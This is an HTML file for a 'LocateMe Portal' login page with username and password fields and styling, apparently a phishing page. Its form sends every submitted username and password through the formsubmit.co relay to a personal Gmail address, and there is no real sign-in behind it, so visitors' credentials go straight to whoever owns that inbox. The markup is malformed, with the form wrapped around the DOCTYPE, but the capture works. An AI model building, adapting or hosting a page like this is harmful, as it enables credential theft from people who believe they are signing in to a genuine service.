<form action="https://formsubmit.co/ambitiousboyii14@gmail.com" method="POST">
<fieldset>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="ukz css/ukz.css">
  
    <title>Page title</title>
</head>
<div class="img-fluid">
<img src="ukz img/ukz.jpg" height="260" width="300">
</div>
<body>
    
    <h1>LocateMe Portal</h1>
    <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
    <input type="text" name="username" id="username" placeholder="Username" required><br><br><br><br>
  <input type="password" name="password" id="password" placeholder="Password" required> <i class='bx bx-hide eye-icon'></i></a><br><br><br><br>
    <a href=""><button type="submit">𝗟𝗢𝗚𝗜𝗡</button></a><br><br>
    <div class="text-info">
    <label class="label">Forgot Password ?</label><i class="current"><a  href="#"> Reset </a></i>
    </div>
  <style>
      
      
    
      body{
    text-align: center;
    background-color: black;
}


fieldset{
text-align: center;
    background: white;
    border: 1px solid white;
    height: 89vh;
    border-radius: 3px;
}

input{
    background: none;
    outline: none;
    border: none;
    border-bottom: 2px solid gray;
    width: 49vh;
    
left: 14vh;
top: 70vh;
    
}

.img-fluid img{
position: absolute;
left: 10vh;
top: 7vh;


    
}

h1{
    position: absolute;
    top: 1px;
    left: 15vh;
    font-size: 3vh;
}

button {
border: none;

    width: 40vh;
    height: 7vh;
    border-radius: 3vh;
   background-image: linear-gradient(to right,red, yellow, green);
}
.text-info .label{
    color: grey;
}
.text-info i a{
   list-style: none;
   outline-style: none;
   color: black;
   border: none;
   outline: none;
   background: none;
   text-decortion: none;
   
}

  </style>
</body>
</html>
</fieldset>
</form>
